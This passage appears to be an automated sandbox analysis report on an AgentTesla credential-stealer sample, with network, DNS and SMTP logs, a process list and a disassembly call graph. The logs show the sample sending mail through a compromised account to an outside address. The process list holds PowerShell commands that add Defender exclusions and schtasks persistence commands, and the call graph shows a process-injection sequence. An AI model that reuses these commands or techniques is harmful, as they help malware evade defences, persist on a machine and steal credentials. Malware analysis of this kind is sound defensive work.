                                Mar 18, 2024 14:32:17.686007977 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:17.686680079 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:17.985995054 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:17.986032963 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:18.140448093 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:18.438422918 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:18.439279079 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:18.450187922 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:18.747550964 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:18.747576952 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:18.747899055 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.045941114 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:19.046175957 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.344685078 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:19.344870090 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.643093109 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:19.643418074 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.941389084 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:19.942080021 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.942146063 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.942173004 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:19.942204952 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:20.108503103 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:20.239593029 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:20.406567097 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:20.406672001 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:20.705231905 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:20.705467939 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:21.003506899 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.003885984 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.011807919 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:21.309736967 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.311292887 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.311584949 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:21.609409094 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.609652996 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.609921932 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:21.908092976 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:21.908449888 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.207530975 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:22.207885027 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.506844044 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:22.507055044 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.805356026 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:22.806191921 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.806222916 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.806255102 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:22.806255102 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:23.104370117 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:30.138117075 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:30.178833008 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:32:32.154854059 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:32:32.210038900 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:33:56.911725044 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:33:57.209305048 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:33:57.209341049 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:33:57.209572077 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:33:57.209693909 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:33:57.553703070 CET49708587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:33:57.851042032 CET58749708203.82.48.116192.168.2.5
                                Mar 18, 2024 14:34:00.117048979 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:34:00.415091991 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:34:00.415136099 CET58749711203.82.48.116192.168.2.5
                                Mar 18, 2024 14:34:00.415267944 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:34:00.415498018 CET49711587192.168.2.5203.82.48.116
                                Mar 18, 2024 14:34:00.713021994 CET58749711203.82.48.116192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Mar 18, 2024 14:32:16.886714935 CET5677553192.168.2.51.1.1.1
                                Mar 18, 2024 14:32:17.073313951 CET53567751.1.1.1192.168.2.5
                                Mar 18, 2024 14:32:17.997617006 CET5250753192.168.2.51.1.1.1
                                Mar 18, 2024 14:32:18.117674112 CET53525071.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Mar 18, 2024 14:32:16.886714935 CET192.168.2.51.1.1.10x9d93Standard query (0)mail.cup.org.pkA (IP address)IN (0x0001)false
                                Mar 18, 2024 14:32:17.997617006 CET192.168.2.51.1.1.10xc482Standard query (0)_kerberos._tcp.dc._msdcs.cup.org.pk33IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Mar 18, 2024 14:32:17.073313951 CET1.1.1.1192.168.2.50x9d93No error (0)mail.cup.org.pk203.82.48.116A (IP address)IN (0x0001)false
                                Mar 18, 2024 14:32:18.117674112 CET1.1.1.1192.168.2.50xc482Name error (3)_kerberos._tcp.dc._msdcs.cup.org.pknonenone33IN (0x0001)false

                                SMTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                Mar 18, 2024 14:32:17.686007977 CET58749708203.82.48.116192.168.2.5220 frontend.nayatel.com Axigen ESMTP ready
                                Mar 18, 2024 14:32:17.686680079 CET49708587192.168.2.5203.82.48.116EHLO 210979
                                Mar 18, 2024 14:32:17.986032963 CET58749708203.82.48.116192.168.2.5250-frontend.nayatel.com Axigen ESMTP hello
                                250-PIPELINING
                                250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
                                250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
                                250-8BITMIME
                                250-BINARYMIME
                                250-CHUNKING
                                250-SIZE 2097152000
                                250-STARTTLS
                                250-HELP
                                250 OK
                                Mar 18, 2024 14:32:18.140448093 CET49708587192.168.2.5203.82.48.116AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                Mar 18, 2024 14:32:18.439279079 CET58749708203.82.48.116192.168.2.5535 Authentication failed
                                Mar 18, 2024 14:32:18.450187922 CET49708587192.168.2.5203.82.48.116AUTH login bmFzZWVyQGN1cC5vcmcucGs=
                                Mar 18, 2024 14:32:18.747576952 CET58749708203.82.48.116192.168.2.5334 UGFzc3dvcmQ6
                                Mar 18, 2024 14:32:19.045941114 CET58749708203.82.48.116192.168.2.5235 Authentication successful
                                Mar 18, 2024 14:32:19.046175957 CET49708587192.168.2.5203.82.48.116MAIL FROM:<naseer@cup.org.pk>
                                Mar 18, 2024 14:32:19.344685078 CET58749708203.82.48.116192.168.2.5250 Sender accepted
                                Mar 18, 2024 14:32:19.344870090 CET49708587192.168.2.5203.82.48.116RCPT TO:<admin@glamourstorepa.com.br>
                                Mar 18, 2024 14:32:19.643093109 CET58749708203.82.48.116192.168.2.5250 Recipient accepted
                                Mar 18, 2024 14:32:19.643418074 CET49708587192.168.2.5203.82.48.116DATA
                                Mar 18, 2024 14:32:19.941389084 CET58749708203.82.48.116192.168.2.5354 Ready to receive data; remember <CRLF>.<CRLF>
                                Mar 18, 2024 14:32:19.942204952 CET49708587192.168.2.5203.82.48.116.
                                Mar 18, 2024 14:32:20.705231905 CET58749711203.82.48.116192.168.2.5220 frontend.nayatel.com Axigen ESMTP ready
                                Mar 18, 2024 14:32:20.705467939 CET49711587192.168.2.5203.82.48.116EHLO 210979
                                Mar 18, 2024 14:32:21.003885984 CET58749711203.82.48.116192.168.2.5250-frontend.nayatel.com Axigen ESMTP hello
                                250-PIPELINING
                                250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
                                250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
                                250-8BITMIME
                                250-BINARYMIME
                                250-CHUNKING
                                250-SIZE 2097152000
                                250-STARTTLS
                                250-HELP
                                250 OK
                                Mar 18, 2024 14:32:21.011807919 CET49711587192.168.2.5203.82.48.116AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                Mar 18, 2024 14:32:21.311292887 CET58749711203.82.48.116192.168.2.5535 Authentication failed
                                Mar 18, 2024 14:32:21.311584949 CET49711587192.168.2.5203.82.48.116AUTH login bmFzZWVyQGN1cC5vcmcucGs=
                                Mar 18, 2024 14:32:21.609652996 CET58749711203.82.48.116192.168.2.5334 UGFzc3dvcmQ6
                                Mar 18, 2024 14:32:21.908092976 CET58749711203.82.48.116192.168.2.5235 Authentication successful
                                Mar 18, 2024 14:32:21.908449888 CET49711587192.168.2.5203.82.48.116MAIL FROM:<naseer@cup.org.pk>
                                Mar 18, 2024 14:32:22.207530975 CET58749711203.82.48.116192.168.2.5250 Sender accepted
                                Mar 18, 2024 14:32:22.207885027 CET49711587192.168.2.5203.82.48.116RCPT TO:<admin@glamourstorepa.com.br>
                                Mar 18, 2024 14:32:22.506844044 CET58749711203.82.48.116192.168.2.5250 Recipient accepted
                                Mar 18, 2024 14:32:22.507055044 CET49711587192.168.2.5203.82.48.116DATA
                                Mar 18, 2024 14:32:22.805356026 CET58749711203.82.48.116192.168.2.5354 Ready to receive data; remember <CRLF>.<CRLF>
                                Mar 18, 2024 14:32:22.806255102 CET49711587192.168.2.5203.82.48.116.
                                Mar 18, 2024 14:32:30.138117075 CET58749708203.82.48.116192.168.2.5250 Mail queued for delivery
                                Mar 18, 2024 14:32:32.154854059 CET58749711203.82.48.116192.168.2.5250 Mail queued for delivery
                                Mar 18, 2024 14:33:56.911725044 CET49708587192.168.2.5203.82.48.116QUIT
                                Mar 18, 2024 14:33:57.209305048 CET58749708203.82.48.116192.168.2.5221-frontend.nayatel.com Axigen ESMTP is closing connection
                                221 Good bye
                                Mar 18, 2024 14:34:00.117048979 CET49711587192.168.2.5203.82.48.116QUIT
                                Mar 18, 2024 14:34:00.415091991 CET58749711203.82.48.116192.168.2.5221-frontend.nayatel.com Axigen ESMTP is closing connection
                                221 Good bye

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:14:32:11
                                Start date:18/03/2024
                                Path:C:\Users\user\Desktop\P020241901.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\P020241901.exe
                                Imagebase:0x30000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe
                                Imagebase:0xf60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Imagebase:0xf60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
                                Imagebase:0xb30000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:14:32:13
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:14:32:13
                                Start date:18/03/2024
                                Path:C:\Users\user\Desktop\P020241901.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\P020241901.exe
                                Imagebase:0x530000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:10
                                Start time:14:32:14
                                Start date:18/03/2024
                                Path:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Imagebase:0x290000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 66%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:11
                                Start time:14:32:15
                                Start date:18/03/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp
                                Imagebase:0xb30000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:13
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Imagebase:0x7b0000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:11.8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:260
                                  Total number of Limit Nodes:11
                                  execution_graph 34616 6ed01c 34617 6ed034 34616->34617 34618 6ed08e 34617->34618 34621 4a92c08 34617->34621 34630 4a90ad4 34617->34630 34624 4a92c45 34621->34624 34622 4a92c79 34655 4a90bfc 34622->34655 34624->34622 34625 4a92c69 34624->34625 34639 4a92e6c 34625->34639 34645 4a92da0 34625->34645 34650 4a92d90 34625->34650 34626 4a92c77 34633 4a90adf 34630->34633 34631 4a92c79 34632 4a90bfc CallWindowProcW 34631->34632 34635 4a92c77 34632->34635 34633->34631 34634 4a92c69 34633->34634 34636 4a92e6c CallWindowProcW 34634->34636 34637 4a92da0 CallWindowProcW 34634->34637 34638 4a92d90 CallWindowProcW 34634->34638 34636->34635 34637->34635 34638->34635 34640 4a92e2a 34639->34640 34641 4a92e7a 34639->34641 34659 4a92e58 34640->34659 34662 4a92e47 34640->34662 34642 4a92e40 34642->34626 34647 4a92db4 34645->34647 34646 4a92e40 34646->34626 34648 4a92e58 CallWindowProcW 34647->34648 34649 4a92e47 CallWindowProcW 34647->34649 34648->34646 34649->34646 34652 4a92db4 34650->34652 34651 4a92e40 34651->34626 34653 4a92e58 CallWindowProcW 34652->34653 34654 4a92e47 CallWindowProcW 34652->34654 34653->34651 34654->34651 34656 4a90c07 34655->34656 34657 4a9435a CallWindowProcW 34656->34657 34658 4a94309 34656->34658 34657->34658 34658->34626 34660 4a92e69 34659->34660 34665 4a94293 34659->34665 34660->34642 34663 4a92e69 34662->34663 34664 4a94293 CallWindowProcW 34662->34664 34663->34642 34664->34663 34666 4a90bfc CallWindowProcW 34665->34666 34667 4a942aa 34666->34667 34667->34660 34668 6ed8bd0 34669 6ed8bf6 34668->34669 34671 6ed8d5b 34668->34671 34669->34671 34672 6ed71dc 34669->34672 34673 6ed8e50 PostMessageW 34672->34673 34674 6ed8ebc 34673->34674 34674->34669 34368 6ed51f3 34369 6ed50ec 34368->34369 34370 6ed5150 34369->34370 34375 6ed7ab8 34369->34375 34392 6ed7b16 34369->34392 34410 6ed7aab 34369->34410 34427 6ed7a68 34369->34427 34376 6ed7ac9 34375->34376 34377 6ed7af6 34376->34377 34444 6ed826c 34376->34444 34449 6ed7f5b 34376->34449 34456 6ed8299 34376->34456 34461 6ed8659 34376->34461 34465 6ed7f3f 34376->34465 34472 6ed8182 34376->34472 34476 6ed8302 34376->34476 34481 6ed80e3 34376->34481 34488 6ed80a0 34376->34488 34494 6ed81e1 34376->34494 34499 6ed83a6 34376->34499 34504 6ed85a5 34376->34504 34511 6ed820a 34376->34511 34518 6ed7ee8 34376->34518 34377->34370 34393 6ed7aa4 34392->34393 34395 6ed7b19 34392->34395 34394 6ed7af6 34393->34394 34396 6ed826c 2 API calls 34393->34396 34397 6ed7ee8 2 API calls 34393->34397 34398 6ed820a 4 API calls 34393->34398 34399 6ed85a5 4 API calls 34393->34399 34400 6ed83a6 2 API calls 34393->34400 34401 6ed81e1 2 API calls 34393->34401 34402 6ed80a0 2 API calls 34393->34402 34403 6ed80e3 4 API calls 34393->34403 34404 6ed8302 2 API calls 34393->34404 34405 6ed8182 2 API calls 34393->34405 34406 6ed7f3f 4 API calls 34393->34406 34407 6ed8659 2 API calls 34393->34407 34408 6ed8299 2 API calls 34393->34408 34409 6ed7f5b 4 API calls 34393->34409 34394->34370 34395->34370 34396->34394 34397->34394 34398->34394 34399->34394 34400->34394 34401->34394 34402->34394 34403->34394 34404->34394 34405->34394 34406->34394 34407->34394 34408->34394 34409->34394 34411 6ed7ac9 34410->34411 34412 6ed826c 2 API calls 34411->34412 34413 6ed7ee8 2 API calls 34411->34413 34414 6ed820a 4 API calls 34411->34414 34415 6ed85a5 4 API calls 34411->34415 34416 6ed7af6 34411->34416 34417 6ed83a6 2 API calls 34411->34417 34418 6ed81e1 2 API calls 34411->34418 34419 6ed80a0 2 API calls 34411->34419 34420 6ed80e3 4 API calls 34411->34420 34421 6ed8302 2 API calls 34411->34421 34422 6ed8182 2 API calls 34411->34422 34423 6ed7f3f 4 API calls 34411->34423 34424 6ed8659 2 API calls 34411->34424 34425 6ed8299 2 API calls 34411->34425 34426 6ed7f5b 4 API calls 34411->34426 34412->34416 34413->34416 34414->34416 34415->34416 34416->34370 34417->34416 34418->34416 34419->34416 34420->34416 34421->34416 34422->34416 34423->34416 34424->34416 34425->34416 34426->34416 34428 6ed7a76 34427->34428 34428->34370 34429 6ed7af6 34428->34429 34430 6ed826c 2 API calls 34428->34430 34431 6ed7ee8 2 API calls 34428->34431 34432 6ed820a 4 API calls 34428->34432 34433 6ed85a5 4 API calls 34428->34433 34434 6ed83a6 2 API calls 34428->34434 34435 6ed81e1 2 API calls 34428->34435 34436 6ed80a0 2 API calls 34428->34436 34437 6ed80e3 4 API calls 34428->34437 34438 6ed8302 2 API calls 34428->34438 34439 6ed8182 2 API calls 34428->34439 34440 6ed7f3f 4 API calls 34428->34440 34441 6ed8659 2 API calls 34428->34441 34442 6ed8299 2 API calls 34428->34442 34443 6ed7f5b 4 API calls 34428->34443 34429->34370 34430->34429 34431->34429 34432->34429 34433->34429 34434->34429 34435->34429 34436->34429 34437->34429 34438->34429 34439->34429 34440->34429 34441->34429 34442->34429 34443->34429 34445 6ed8706 34444->34445 34522 6ed48b0 34445->34522 34526 6ed48a8 34445->34526 34446 6ed8721 34450 6ed7f47 34449->34450 34450->34377 34451 6ed8789 34450->34451 34530 6ed4a48 34450->34530 34534 6ed4a40 34450->34534 34538 6ed4988 34450->34538 34542 6ed4980 34450->34542 34451->34377 34457 6ed82a2 34456->34457 34459 6ed4a48 WriteProcessMemory 34457->34459 34460 6ed4a40 WriteProcessMemory 34457->34460 34458 6ed8387 34458->34377 34459->34458 34460->34458 34463 6ed4a48 WriteProcessMemory 34461->34463 34464 6ed4a40 WriteProcessMemory 34461->34464 34462 6ed868c 34463->34462 34464->34462 34466 6ed7f47 34465->34466 34466->34377 34467 6ed8789 34466->34467 34468 6ed4a48 WriteProcessMemory 34466->34468 34469 6ed4a40 WriteProcessMemory 34466->34469 34470 6ed4988 VirtualAllocEx 34466->34470 34471 6ed4980 VirtualAllocEx 34466->34471 34467->34377 34468->34466 34469->34466 34470->34466 34471->34466 34546 6ed4b38 34472->34546 34550 6ed4b36 34472->34550 34473 6ed81a4 34477 6ed82ba 34476->34477 34477->34476 34479 6ed48a8 Wow64SetThreadContext 34477->34479 34480 6ed48b0 Wow64SetThreadContext 34477->34480 34478 6ed84bd 34479->34478 34480->34478 34482 6ed7f47 34481->34482 34482->34377 34483 6ed8789 34482->34483 34484 6ed4988 VirtualAllocEx 34482->34484 34485 6ed4980 VirtualAllocEx 34482->34485 34486 6ed4a48 WriteProcessMemory 34482->34486 34487 6ed4a40 WriteProcessMemory 34482->34487 34483->34377 34483->34483 34484->34482 34485->34482 34486->34482 34487->34482 34489 6ed80ba 34488->34489 34490 6ed87a2 34489->34490 34554 6ed47fe 34489->34554 34558 6ed4800 34489->34558 34491 6ed83d2 34495 6ed8204 34494->34495 34496 6ed868c 34495->34496 34497 6ed4a48 WriteProcessMemory 34495->34497 34498 6ed4a40 WriteProcessMemory 34495->34498 34497->34496 34498->34496 34500 6ed83ac 34499->34500 34502 6ed47fe ResumeThread 34500->34502 34503 6ed4800 ResumeThread 34500->34503 34501 6ed83d2 34502->34501 34503->34501 34505 6ed7f47 34504->34505 34505->34377 34506 6ed8789 34505->34506 34507 6ed4988 VirtualAllocEx 34505->34507 34508 6ed4980 VirtualAllocEx 34505->34508 34509 6ed4a48 WriteProcessMemory 34505->34509 34510 6ed4a40 WriteProcessMemory 34505->34510 34506->34377 34507->34505 34508->34505 34509->34505 34510->34505 34512 6ed7f47 34511->34512 34512->34377 34513 6ed8789 34512->34513 34514 6ed4a48 WriteProcessMemory 34512->34514 34515 6ed4a40 WriteProcessMemory 34512->34515 34516 6ed4988 VirtualAllocEx 34512->34516 34517 6ed4980 VirtualAllocEx 34512->34517 34513->34377 34514->34512 34515->34512 34516->34512 34517->34512 34562 6ed4cc4 34518->34562 34566 6ed4cd0 34518->34566 34523 6ed48f5 Wow64SetThreadContext 34522->34523 34525 6ed493d 34523->34525 34525->34446 34527 6ed48f5 Wow64SetThreadContext 34526->34527 34529 6ed493d 34527->34529 34529->34446 34531 6ed4a90 WriteProcessMemory 34530->34531 34533 6ed4ae7 34531->34533 34533->34450 34535 6ed4a49 WriteProcessMemory 34534->34535 34537 6ed4ae7 34535->34537 34537->34450 34539 6ed49c8 VirtualAllocEx 34538->34539 34541 6ed4a05 34539->34541 34541->34450 34543 6ed49c8 